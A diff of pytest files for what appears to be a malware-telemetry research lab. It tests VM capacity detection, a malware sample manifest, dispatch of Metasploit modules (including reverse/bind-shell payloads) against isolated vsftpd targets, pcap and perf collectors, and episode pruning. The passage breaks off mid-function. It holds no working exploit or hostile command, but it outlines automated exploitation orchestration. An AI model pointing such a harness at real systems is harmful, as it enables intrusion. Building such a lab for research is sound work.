+    monkeypatch.setattr(
+        fleet, "_read_meminfo",
+        lambda: {
+            "MemTotal": ram_total_mib * 1024 * 1024,
+            "MemAvailable": ram_available_mib * 1024 * 1024,
+        },
+    )
+    monkeypatch.setattr(fleet, "_read_loadavg", lambda: load_1m)
+
+
+def test_capacity_8core_idle_box(monkeypatch) -> None:
+    _patch_capacity_inputs(monkeypatch, cores=8, ram_total_mib=16384, ram_available_mib=14000)
+    c = fleet.detect_capacity(ram_per_vm_mib=320)
+    assert c.cores_total == 8
+    assert c.cores_reserved == 1  # 8 // 8 = 1
+    assert c.max_by_cores == 7
+    # Plenty of RAM, idle → cores binding.
+    assert c.max_concurrent == 7
+    assert "binding=cores" in c.rationale
+
+
+def test_capacity_low_ram_caps_below_cores(monkeypatch) -> None:
+    # 8 cores but only ~2 GiB free → ram caps below cores.
+    _patch_capacity_inputs(monkeypatch, cores=8, ram_total_mib=4096, ram_available_mib=2048)
+    c = fleet.detect_capacity(ram_per_vm_mib=320)
+    # headroom = max(1024, 4096//8) = 1024
+    # max_by_ram = (2048 - 1024) // 320 = 3
+    assert c.max_by_ram == 3
+    assert c.max_concurrent == 3
+
+
+def test_capacity_high_load_halves_concurrency(monkeypatch) -> None:
+    # 8 cores, plenty of RAM, but load_1m / cores > 0.75
+    _patch_capacity_inputs(
+        monkeypatch, cores=8, ram_total_mib=16384, ram_available_mib=14000,
+        load_1m=7.0,  # 7/8 = 0.875 > 0.75
+    )
+    c = fleet.detect_capacity(ram_per_vm_mib=320)
+    # max_by_cores = 7; max_by_load = max(1, 7//2) = 3
+    assert c.max_by_load == 3
+    assert c.max_concurrent == 3
+
+
+def test_capacity_pi5_class(monkeypatch) -> None:
+    """4 cores + 8 GiB → reserve 1 core, run 3 concurrent."""
+    _patch_capacity_inputs(monkeypatch, cores=4, ram_total_mib=7951, ram_available_mib=5223)
+    c = fleet.detect_capacity(ram_per_vm_mib=320)
+    assert c.cores_total == 4
+    assert c.max_concurrent == 3
+
+
+def test_capacity_minimal_box(monkeypatch) -> None:
+    """1-core 1 GiB host shouldn't try to run any VMs."""
+    _patch_capacity_inputs(monkeypatch, cores=1, ram_total_mib=1024, ram_available_mib=512)
+    c = fleet.detect_capacity(ram_per_vm_mib=320)
+    assert c.max_concurrent == 0
+
+
+def test_capacity_to_dict_round_trips(monkeypatch) -> None:
+    _patch_capacity_inputs(monkeypatch, cores=4, ram_total_mib=8000, ram_available_mib=6000)
+    c = fleet.detect_capacity(ram_per_vm_mib=320)
+    d = c.to_dict()
+    assert d["cores_total"] == 4
+    assert d["max_concurrent"] == c.max_concurrent
+    assert "rationale" in d
+
+
+# ---------------------------------------------------------------------------
+# Sample manifest
+# ---------------------------------------------------------------------------
+
+
+def test_repo_manifest_loads() -> None:
+    m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
+    assert len(m) >= 4
+    # Every entry has required fields.
+    for s in m.samples:
+        assert s.name and s.family and s.category and s.profile
+    # All "mimic" today; will switch as real samples are added.
+    assert all(s.kind == "mimic" for s in m.samples)
+
+
+def test_selection_is_deterministic() -> None:
+    m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
+    a = m.select(host_id="lab-1", slot=2, episode_index=5)
+    b = m.select(host_id="lab-1", slot=2, episode_index=5)
+    assert a is b
+
+
+def test_selection_differs_across_hosts() -> None:
+    """Two hosts on the same slot/episode should generally hit
+    different samples (probabilistic — assert distribution, not
+    individual equality).
+    """
+    m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
+    if len(m) < 2:
+        pytest.skip("manifest too small for diversity check")
+    matches = 0
+    for slot in range(20):
+        a = m.select(host_id="alice", slot=slot, episode_index=0)
+        b = m.select(host_id="bob",   slot=slot, episode_index=0)
+        if a is b:
+            matches += 1
+    # If the catalog has N samples, naive collision rate ~1/N. With
+    # 20 trials and N≥4 we expect ~5 matches; allow up to half.
+    assert matches < 15, "host_id seed isn't producing variety"
+
+
+def test_selection_walks_catalog_across_episodes() -> None:
+    """A single host over many episodes should hit every sample at
+    least once."""
+    m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
+    seen = set()
+    for ep in range(200):
+        seen.add(m.select(host_id="lab-x", slot=0, episode_index=ep).name)
+    assert len(seen) == len(m), f"only saw {len(seen)}/{len(m)} samples"
+
+
+def test_manifest_rejects_missing_required_field(tmp_path: Path) -> None:
+    p = tmp_path / "bad.toml"
+    p.write_text(
+        '[[sample]]\n'
+        'name = "x"\n'
+        'family = "y"\n'
+        '# missing category\n'
+        'profile = "z"\n'
+    )
+    with pytest.raises(ValueError, match="category"):
+        SampleManifest.load(p)
+
+
+def test_manifest_rejects_unknown_category(tmp_path: Path) -> None:
+    p = tmp_path / "bad.toml"
+    p.write_text(
+        '[[sample]]\n'
+        'name = "x"\n'
+        'family = "y"\n'
+        'category = "fish"\n'
+        'profile = "z"\n'
+    )
+    with pytest.raises(ValueError, match="category"):
+        SampleManifest.load(p)
+
+
+def test_manifest_rejects_duplicate_names(tmp_path: Path) -> None:
+    p = tmp_path / "dup.toml"
+    p.write_text(
+        '[[sample]]\n'
+        'name = "x"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
+        '\n[[sample]]\n'
+        'name = "x"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
+    )
+    with pytest.raises(ValueError, match="duplicate"):
+        SampleManifest.load(p)
+
+
+# ---------------------------------------------------------------------------
+# Fleet dispatch — Tier 3 vs Tier 2 selection + per-slot module rotation
+# ---------------------------------------------------------------------------
+
+
+class _RecordingPopen:
+    """Replacement for subprocess.run that just records what it would
+    have invoked. Returns a returncode-0 result."""
+    calls: list[dict] = []
+
+    def __init__(self, args, **kwargs) -> None:
+        # Mimic CompletedProcess shape.
+        type(self).calls.append({"args": args, "env": kwargs.get("env"), "cwd": kwargs.get("cwd")})
+        self.returncode = 0
+        self.stdout = b""
+        self.stderr = b""
+
+
+def _fleet_cfg_with_modules(tmp_path: Path, *, force_tier2: bool = False):
+    from exploits.modules import load_module_configs
+    from orchestrator import fleet
+    from samples.manifest import SampleManifest
+
+    repo_root = REPO_ROOT
+    return fleet.FleetConfig(
+        host_id="test-host",
+        repo_root=repo_root,
+        data_root=tmp_path,
+        manifest=SampleManifest.load(repo_root / "samples" / "manifest.toml"),
+        modules=load_module_configs(repo_root / "exploits" / "modules"),
+        force_tier2=force_tier2,
+    )
+
+
+def _patch_subprocess(monkeypatch):
+    from orchestrator import fleet
+    _RecordingPopen.calls = []
+    monkeypatch.setattr(fleet.subprocess, "run", _RecordingPopen)
+
+
+def test_fleet_dispatches_to_tier3_when_msfrpcd_listening(monkeypatch, tmp_path) -> None:
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+
+    assert res.tier == "tier3", res
+    assert res.module_name in cfg.modules
+    cmd = _RecordingPopen.calls[-1]["args"]
+    # The Tier-3 runner is what gets invoked.
+    assert any("run_tier3_demo.py" in str(a) for a in cmd)
+    # The module name is plumbed through.
+    assert "--module" in cmd
+    assert res.module_name in cmd
+
+
+def test_fleet_falls_back_to_tier2_when_msfrpcd_down(monkeypatch, tmp_path) -> None:
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: False)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+
+    assert res.tier == "tier2"
+    assert res.module_name is None
+    cmd = _RecordingPopen.calls[-1]["args"]
+    assert any("run_real_vm_demo.py" in str(a) for a in cmd)
+
+
+def test_fleet_falls_back_to_tier2_when_module_catalog_empty(monkeypatch, tmp_path) -> None:
+    from orchestrator import fleet
+    from samples.manifest import SampleManifest
+    cfg = fleet.FleetConfig(
+        host_id="test-host",
+        repo_root=REPO_ROOT,
+        data_root=tmp_path,
+        manifest=SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml"),
+        modules={},  # explicitly empty
+    )
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+    assert res.tier == "tier2"
+
+
+def test_fleet_force_tier2_overrides_msfrpcd(monkeypatch, tmp_path) -> None:
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path, force_tier2=True)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+    assert res.tier == "tier2"
+
+
+def test_fleet_skips_requires_bridge_modules_when_no_bridge(monkeypatch, tmp_path) -> None:
+    """Fleet must filter out callback-payload modules when BRIDGE is
+    unset — otherwise the exploit fires but the session never lands
+    and the episode degenerates to a 30 s session_open_timeout."""
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    monkeypatch.delenv("BRIDGE", raising=False)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    seen_modules = set()
+    for ep in range(20):
+        res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=ep, capacity=capacity)
+        if res.tier == "tier3" and res.module_name:
+            seen_modules.add(res.module_name)
+
+    # Every selected module must be callback-free (same-socket).
+    callback_modules = {
+        m.name for m in cfg.modules.values() if m.requires_bridge
+    }
+    assert callback_modules, "test setup error: expected some require_bridge modules"
+    assert not (seen_modules & callback_modules), \
+        f"selected callback modules without BRIDGE: {seen_modules & callback_modules}"
+
+
+def test_fleet_uses_all_modules_when_bridge_set(monkeypatch, tmp_path) -> None:
+    """With BRIDGE set, the full catalog (including reverse/bind shell
+    payloads) is in rotation."""
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    monkeypatch.setenv("BRIDGE", "br-malware")
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    seen = set()
+    for ep in range(40):
+        res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=ep, capacity=capacity)
+        if res.tier == "tier3" and res.module_name:
+            seen.add(res.module_name)
+    assert seen == set(cfg.modules.keys()), \
+        f"only saw {seen}/{set(cfg.modules.keys())}"
+
+
+def test_fleet_propagates_bridge_env_to_runner(monkeypatch, tmp_path) -> None:
+    """When BRIDGE is set in the parent env, the per-slot subprocess
+    env must carry it through so launch_target.sh enters tap+bridge mode."""
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    monkeypatch.setenv("BRIDGE", "br-malware")
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+    sample = cfg.manifest.samples[0]
+    fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+    assert _RecordingPopen.calls[-1]["env"]["BRIDGE"] == "br-malware"
+
+
+def test_fleet_assigns_unique_port_base_per_slot(monkeypatch, tmp_path) -> None:
+    """Concurrent Tier-3 slots can't share the host-side hostfwd port
+    or all targets stomp on each other's vsftpd:21 → 21 mapping. The
+    fleet must shift PORT_BASE per slot."""
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+    fleet._run_slot(cfg, slot=1, sample=sample, episode_index=0, capacity=capacity)
+    fleet._run_slot(cfg, slot=2, sample=sample, episode_index=0, capacity=capacity)
+
+    port_bases = [c["env"]["PORT_BASE"] for c in _RecordingPopen.calls]
+    assert len(set(port_bases)) == len(port_bases), \
+        f"PORT_BASE collision across slots: {port_bases}"
+
+
+def test_manifest_marks_real_when_sha256_present(tmp_path: Path) -> None:
+    p = tmp_path / "real.toml"
+    p.write_text(
+        '[[sample]]\n'
+        'name = "real-one"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
+        'sha256 = "abc123"\n'
+        '\n[[sample]]\n'
+        'name = "mimic-one"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
+    )
+    m = SampleManifest.load(p)
+    by_name = {s.name: s for s in m.samples}
+    assert by_name["real-one"].kind == "real"
+    assert by_name["mimic-one"].kind == "mimic"
--- a/tests/test_guest_agent.py
+++ b/tests/test_guest_agent.py
@ -0,0 +1,152 @@
+"""Tests for the host-side guest-agent collector.
+
+We simulate the in-guest agent by spinning up a unix socket server
+(stand-in for the QEMU virtio-serial chardev) that writes a few
+JSON-lines rows. The collector should read them, re-stamp with the
+host's monotonic clock, and persist to telemetry-guest.jsonl.
+"""
+
+from __future__ import annotations
+
+import json
+import socket
+import threading
+import time
+from pathlib import Path
+
+import pytest
+
+from collectors import guest_agent
+
+
+class FakeAgentServer(threading.Thread):
+    def __init__(self, sock_path: Path, rows: list[dict], delay_s: float = 0.05) -> None:
+        super().__init__(daemon=True)
+        self.sock_path = sock_path
+        self.rows = rows
+        self.delay_s = delay_s
+        self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
+        self._sock.bind(str(sock_path))
+        self._sock.listen(1)
+        self._sock.settimeout(5.0)
+
+    def run(self) -> None:
+        try:
+            conn, _ = self._sock.accept()
+        except socket.timeout:
+            return
+        try:
+            for row in self.rows:
+                conn.sendall((json.dumps(row) + "\n").encode())
+                time.sleep(self.delay_s)
+            time.sleep(0.1)
+        finally:
+            conn.close()
+            self._sock.close()
+
+
+def test_collector_reads_jsonl_and_restamps(tmp_path: Path) -> None:
+    sock_path = tmp_path / "agent.sock"
+    rows_in = [
+        {
+            "t_guest_mono_ns": 1, "t_guest_wall_ns": 2,
+            "source": "guest_agent", "available_in_deployment": True,
+            "mem_total_bytes": 256 * 1024 * 1024,
+            "mem_available_bytes": 200 * 1024 * 1024,
+            "load_1m_5m_15m": [0.1, 0.05, 0.0],
+            "cpu_total_jiffies": {"user": 10, "system": 5, "idle": 1000},
+        },
+        {
+            "t_guest_mono_ns": 100_000_000, "t_guest_wall_ns": 100_000_002,
+            "source": "guest_agent", "available_in_deployment": True,
+            "mem_total_bytes": 256 * 1024 * 1024,
+            "mem_available_bytes": 198 * 1024 * 1024,
+        },
+    ]
+    server = FakeAgentServer(sock_path, rows_in, delay_s=0.02)
+    server.start()
+    out_path = tmp_path / "telemetry-guest.jsonl"
+    stop = threading.Event()
+
+    def stop_after(ms: int) -> None:
+        time.sleep(ms / 1000.0)
+        stop.set()
+
+    threading.Thread(target=stop_after, args=(300,), daemon=True).start()
+
+    rows_written = guest_agent.run_loop(
+        socket_path=sock_path,
+        output_path=out_path,
+        t_mono_origin_ns=time.monotonic_ns(),
+        stop_event=stop,
+        connect_timeout_s=2.0,
+    )
+    server.join(timeout=2)
+
+    assert rows_written == 2
+    persisted = [json.loads(l) for l in out_path.read_text().splitlines()]
+    assert len(persisted) == 2
+    for orig, got in zip(rows_in, persisted):
+        # Original guest timestamps preserved.
+        assert got["t_guest_mono_ns"] == orig["t_guest_mono_ns"]
+        # Host-clock fields added.
+        assert "t_mono_ns" in got
+        assert "t_wall_ns" in got
+        assert got["source"] == "guest_agent"
+        assert got["available_in_deployment"] is True
+
+
+def test_collector_returns_zero_when_socket_missing(tmp_path: Path) -> None:
+    rows = guest_agent.run_loop(
+        socket_path=tmp_path / "no-socket-here.sock",
+        output_path=tmp_path / "out.jsonl",
+        t_mono_origin_ns=time.monotonic_ns(),
+        stop_event=threading.Event(),
+        connect_timeout_s=0.5,
+    )
+    assert rows == 0
+
+
+def test_collector_drops_malformed_lines_but_keeps_going(tmp_path: Path) -> None:
+    sock_path = tmp_path / "agent.sock"
+    # Will be sent verbatim; the malformed line should be skipped.
+    payload = (
+        b'{"source":"guest_agent","mem_total_bytes":1}\n'
+        b'this-is-not-json\n'
+        b'{"source":"guest_agent","mem_total_bytes":2}\n'
+    )
+
+    class Server(threading.Thread):
+        def __init__(self) -> None:
+            super().__init__(daemon=True)
+            self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
+            self._sock.bind(str(sock_path))
+            self._sock.listen(1)
+
+        def run(self) -> None:
+            conn, _ = self._sock.accept()
+            try:
+                conn.sendall(payload)
+                time.sleep(0.2)
+            finally:
+                conn.close()
+                self._sock.close()
+
+    s = Server()
+    s.start()
+    out_path = tmp_path / "out.jsonl"
+    stop = threading.Event()
+    threading.Thread(
+        target=lambda: (time.sleep(0.4), stop.set()), daemon=True
+    ).start()
+    rows = guest_agent.run_loop(
+        socket_path=sock_path,
+        output_path=out_path,
+        t_mono_origin_ns=time.monotonic_ns(),
+        stop_event=stop,
+        connect_timeout_s=2.0,
+    )
+    s.join(timeout=2)
+    assert rows == 2
+    persisted = [json.loads(l) for l in out_path.read_text().splitlines()]
+    assert [r["mem_total_bytes"] for r in persisted] == [1, 2]
--- a/tests/test_pcap.py
+++ b/tests/test_pcap.py
@ -0,0 +1,188 @@
+"""Tests for the pcap collector's pure-Python parser + bucketizer.
+
+We synthesize a tiny pcap file in memory (Ethernet + IPv4 + TCP/UDP
+records with controlled timestamps), feed it to ``bucketize()``, and
+verify the produced netflow.jsonl rows are correct.
+"""
+
+from __future__ import annotations
+
+import json
+import struct
+from pathlib import Path
+
+import pytest
+
+from collectors import pcap
+
+
+# ---------------------------------------------------------------------------
+# pcap synthesis helpers
+# ---------------------------------------------------------------------------
+
+
+_PCAP_GLOBAL_HDR = struct.pack(
+    "<IHHiIII",
+    0xa1b2c3d4,  # magic (us)
+    2, 4,        # version
+    0,           # thiszone
+    0,           # sigfigs
+    65535,       # snaplen
+    1,           # linktype = LINKTYPE_ETHERNET
+)
+
+
+def _ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
+    s = bytes(int(x) for x in src.split("."))
+    d = bytes(int(x) for x in dst.split("."))
+    total_len = 20 + len(payload)
+    return struct.pack(
+        ">BBHHHBBHII"[:0] + "BBHHHBBH",
+        0x45,             # version=4, IHL=5
+        0,                # tos
+        total_len,
+        0, 0, 64, proto,
+        0,                # checksum (don't care)
+    ) + s + d + payload
+
+
+def _tcp(sport: int, dport: int, flags: int) -> bytes:
+    # Minimal 20-byte TCP header: sport, dport, seq, ack, off+flags, win, csum, urg
+    return struct.pack(">HHIIBBHHH",
+                       sport, dport,
+                       0, 0,
+                       0x50,           # data offset = 5 (no options)
+                       flags,
+                       0, 0, 0)
+
+
+def _udp(sport: int, dport: int, length: int = 8) -> bytes:
+    return struct.pack(">HHHH", sport, dport, length, 0)
+
+
+def _ether(payload: bytes, ethertype: int = 0x0800) -> bytes:
+    return b"\x02\x00\x00\x00\x00\x01" + b"\x02\x00\x00\x00\x00\x02" + struct.pack(">H", ethertype) + payload
+
+
+def _record(ts_ns: int, frame: bytes) -> bytes:
+    sec = ts_ns // 1_000_000_000
+    usec = (ts_ns // 1000) % 1_000_000
+    return struct.pack("<IIII", sec, usec, len(frame), len(frame)) + frame
+
+
+def _build_pcap(records: list[tuple[int, bytes]]) -> bytes:
+    out = bytearray(_PCAP_GLOBAL_HDR)
+    for ts, frame in records:
+        out += _record(ts, frame)
+    return bytes(out)
+
+
+def _write_pcap(path: Path, records: list[tuple[int, bytes]]) -> None:
+    path.write_bytes(_build_pcap(records))
+
+
+# ---------------------------------------------------------------------------
+# Tests
+# ---------------------------------------------------------------------------
+
+
+def test_iter_pcap_reads_records_back(tmp_path: Path) -> None:
+    p = tmp_path / "a.pcap"
+    frame = _ether(_ipv4("10.200.0.1", "10.200.0.10", 6, _tcp(40000, 21, flags=0x02)))
+    _write_pcap(p, [(1_000_000_000, frame)])
+
+    records = list(pcap._iter_pcap(p))
+    assert len(records) == 1
+    t_ns, data = records[0]
+    assert t_ns == 1_000_000_000
+    assert data == frame
+
+
+def test_decode_tcp_syn() -> None:
+    f = _ether(_ipv4("10.200.0.1", "10.200.0.10", 6, _tcp(40000, 21, flags=0x02)))
+    d = pcap._decode(f)
+    assert d["ethertype"] == 0x0800
+    assert d["ip_proto"] == 6
+    assert d["src_ip"] == "10.200.0.1"
+    assert d["dst_ip"] == "10.200.0.10"
+    assert d["src_port"] == 40000
+    assert d["dst_port"] == 21
+    assert d["tcp_flags"] & 0x02
+
+
+def test_decode_udp_dns_query() -> None:
+    f = _ether(_ipv4("10.200.0.10", "10.200.0.1", 17, _udp(33333, 53)))
+    d = pcap._decode(f)
+    assert d["ip_proto"] == 17
+    assert d["dst_port"] == 53
+
+
+def test_bucketize_collapses_per_window(tmp_path: Path) -> None:
+    pcap_path = tmp_path / "ep.pcap"
+    netflow_path = tmp_path / "netflow.jsonl"
+
+    bridge_ip = "10.200.0.1"
+    guest_ip = "10.200.0.10"
+    base_ns = 1_700_000_000_000_000_000  # arbitrary, aligned-friendly
+
+    records = [
+        # Bucket A (0..100ms)
+        (base_ns + 5_000_000,
+         _ether(_ipv4(guest_ip, bridge_ip, 6, _tcp(40000, 21, flags=0x02)))),
+        (base_ns + 9_000_000,
+         _ether(_ipv4(bridge_ip, guest_ip, 6, _tcp(21, 40000, flags=0x12)))),
+        # Bucket B (100..200ms): UDP DNS query
+        (base_ns + 105_000_000,
+         _ether(_ipv4(guest_ip, bridge_ip, 17, _udp(33333, 53)))),
+        # Bucket B: TCP RST
+        (base_ns + 199_000_000,
+         _ether(_ipv4(bridge_ip, guest_ip, 6, _tcp(21, 40000, flags=0x04)))),
+    ]
+    _write_pcap(pcap_path, records)
+
+    rows_written = pcap.bucketize(
+        pcap_path, netflow_path,
+        bucket_ms=100,
+        t_mono_origin_ns=base_ns,
+        bridge_ip=bridge_ip,
+    )
+    assert rows_written == 2
+
+    rows = [json.loads(l) for l in netflow_path.read_text().splitlines()]
+    a, b = rows
+    assert a["bucket_ms"] == 100
+    # Bucket A: 1 in (SYN), 1 out (SYN-ACK)
+    assert a["pkts_in"] == 1
+    assert a["pkts_out"] == 1
+    assert a["syn_count"] == 2
+    assert a["tcp_new_flows"] == 1  # only the bare SYN counts as new flow
+    assert a["dns_query_count"] == 0
+    assert a["unique_dst_ips"] == 2
+
+    # Bucket B: DNS + RST
+    assert b["dns_query_count"] == 1
+    assert b["rst_count"] == 1
+
+
+def test_bucketize_returns_zero_for_missing_file(tmp_path: Path) -> None:
+    rows = pcap.bucketize(
+        tmp_path / "nope.pcap",
+        tmp_path / "netflow.jsonl",
+        bucket_ms=100,
+        t_mono_origin_ns=0,
+    )
+    assert rows == 0
+
+
+def test_bucketize_handles_unknown_ethertype(tmp_path: Path) -> None:
+    p = tmp_path / "x.pcap"
+    netflow = tmp_path / "n.jsonl"
+    # ARP frame (ethertype 0x0806) — counted but not decoded.
+    f = _ether(b"\x00" * 28, ethertype=0x0806)
+    _write_pcap(p, [(1_000_000_000, f)])
+    rows = pcap.bucketize(p, netflow, bucket_ms=100, t_mono_origin_ns=0)
+    assert rows == 1
+    out = json.loads(netflow.read_text().splitlines()[0])
+    # No IP info, but byte/packet count survives.
+    assert out["pkts_in"] + out["pkts_out"] == 1
+    assert out["tcp_count"] == 0
--- a/tests/test_perf_qemu.py
+++ b/tests/test_perf_qemu.py
@ -0,0 +1,82 @@
+"""Tests for the perf-stat collector — parser logic in isolation
+(no actual perf invocation, since perf needs CAP_SYS_ADMIN and
+hardware counters that the test runner can't assume)."""
+
+from __future__ import annotations
+
+import json
+from pathlib import Path
+
+import pytest
+
+from collectors import perf_qemu
+
+
+def test_parse_event_line_extracts_fields() -> None:
+    line = '{"interval":0.100123,"counter-value":"1234567","unit":"","event":"cycles"}'
+    evt = perf_qemu.parse_perf_event_line(line)
+    assert evt is not None
+    assert evt["event"] == "cycles"
+    assert evt["interval"] == 0.100123
+    assert evt["counter-value"] == "1234567"
+
+
+def test_parse_event_line_skips_non_json() -> None:
+    assert perf_qemu.parse_perf_event_line("") is None
+    assert perf_qemu.parse_perf_event_line("garbage") is None
+    assert perf_qemu.parse_perf_event_line("# Performance counter stats") is None
+
+
+def test_coerce_int_handles_perf_quirks() -> None:
+    assert perf_qemu._coerce_int("1234567") == 1234567
+    assert perf_qemu._coerce_int("1,234,567") == 1234567
+    assert perf_qemu._coerce_int("<not counted>") is None
+    assert perf_qemu._coerce_int("<not supported>") is None
+    assert perf_qemu._coerce_int("") is None
+    assert perf_qemu._coerce_int(None) is None
+    assert perf_qemu._coerce_int(42) == 42
+
+
+def test_build_row_computes_ipc_and_miss_rate() -> None:
+    agg = {
+        "cycles": 1_000_000_000,
+        "instructions": 660_000_000,
+        "cache-references": 1_000_000,
+        "cache-misses": 50_000,
+        "branches": 100_000_000,
+        "branch-misses": 5_000_000,
+        "page-faults": 12,
+        "context-switches": 20,
+    }
+    row = perf_qemu._build_row(t_mono_origin_ns=0, interval_s=0.1, agg=agg)
+    assert row["source"] == "host_perf"
+    assert row["available_in_deployment"] is False
+    assert row["cycles"] == 1_000_000_000
+    assert row["instructions"] == 660_000_000
+    assert pytest.approx(row["ipc"], abs=1e-9) == 0.66
+    assert pytest.approx(row["cache_miss_rate"], abs=1e-9) == 0.05
+    assert row["interval_s"] == 0.1
+
+
+def test_build_row_handles_missing_counters() -> None:
+    """If perf can't enable cache-misses on this hardware, the row
+    should still be valid — just with None for the missing fields."""
+    agg = {"cycles": 100, "instructions": 50}
+    row = perf_qemu._build_row(t_mono_origin_ns=0, interval_s=0.1, agg=agg)
+    assert row["cycles"] == 100
+    assert row["cache_misses"] is None
+    assert row["cache_miss_rate"] is None
+    assert pytest.approx(row["ipc"], abs=1e-9) == 0.5
+
+
+def test_run_loop_returns_zero_when_perf_missing(tmp_path: Path, monkeypatch) -> None:
+    monkeypatch.setattr(perf_qemu, "perf_available", lambda: False)
+    import threading
+    rows = perf_qemu.run_loop(
+        pid=1,
+        output_path=tmp_path / "telemetry-perf.jsonl",
+        t_mono_origin_ns=0,
+        interval_ms=100,
+        stop_event=threading.Event(),
+    )
+    assert rows == 0
--- a/tests/test_prune.py
+++ b/tests/test_prune.py
@ -0,0 +1,309 @@
+"""Tests for cis490-prune. Builds synthetic episode tarballs (each
+flagged with a specific quality issue) and confirms the classifier
+catches them. Then exercises the index-walk + dry-run / archive /
+delete actions on a temp tree so we don't touch real data."""
+
+from __future__ import annotations
+
+import io
+import json
+import shutil
+import subprocess
+import tarfile
+from pathlib import Path
+
+import pytest
+
+
+# Skip the whole module if zstd isn't on PATH (the prune tool shells
+# out for decompression, mirroring the shipper).
+zstd_available = shutil.which("zstd") is not None
+pytestmark = pytest.mark.skipif(not zstd_available, reason="needs system zstd")
+
+
+import sys
+ROOT = Path(__file__).resolve().parent.parent
+sys.path.insert(0, str(ROOT / "tools"))
+import prune_episodes as pe  # noqa: E402
+
+
+# ---------------------------------------------------------------------------
+# tar+zstd builder
+# ---------------------------------------------------------------------------
+
+
+def _make_tar_zst(out_path: Path, files: dict[str, bytes]) -> None:
+    """Build a {episode_id}/<file> layout, tar it, zstd it."""
+    raw_tar = io.BytesIO()
+    with tarfile.open(fileobj=raw_tar, mode="w") as t:
+        for name, data in files.items():
+            info = tarfile.TarInfo(name=name)
+            info.size = len(data)
+            t.addfile(info, io.BytesIO(data))
+    out_path.parent.mkdir(parents=True, exist_ok=True)
+    raw_tmp = out_path.with_suffix(".tar")
+    raw_tmp.write_bytes(raw_tar.getvalue())
+    try:
+        subprocess.check_call(
+            ["zstd", "-q", "-19", "--stdout", str(raw_tmp)],
+            stdout=out_path.open("wb"),
+        )
+    finally:
+        raw_tmp.unlink(missing_ok=True)
+
+
+def _meta(*, sample: dict | None = None, exploit: dict | None = None) -> bytes:
+    return json.dumps({
+        "episode_id": "01TEST",
+        "schema_version": 1,
+        "sample": sample,
+        "exploit": exploit,
+        "result": {"phases_observed": ["clean", "infected_running", "dormant"]},
+    }, sort_keys=True).encode()
+
+
+def _events(rows: list[dict]) -> bytes:
+    return ("\n".join(json.dumps(r, sort_keys=True) for r in rows) + "\n").encode()
+
+
+def _proc_rows(*, flat: bool, n: int = 80) -> bytes:
+    """Synthesize /proc rows with either flat-CPU (no phase signal)
+    or sharply-spiking CPU (clear phase boundaries). The test labels
+    file pairs with these."""
+    out: list[dict] = []
+    for i in range(n):
+        t = i * 100_000_000
+        if flat:
+            jiff = 100 + i * 20  # uniform increment → flat CPU%
+        else:
+            # First third clean (low), middle infected (high), last third dormant (low).
+            jiff = (
+                100 + i * 20 if i < n // 3 or i >= 2 * n // 3
+                else 100 + i * 1000  # huge jump for "infected"
+            )
+        out.append({
+            "t_mono_ns": t,
+            "cpu_user_jiffies": jiff,
+            "cpu_sys_jiffies": 0,
+            "rss_bytes": 1024 * 1024,
+        })
+    return ("\n".join(json.dumps(r) for r in out) + "\n").encode()
+
+
+def _labels(boundary_ns: list[int], names: list[str]) -> bytes:
+    rows = [
+        {"t_mono_ns": t, "phase": p, "prev": names[i - 1] if i else None}
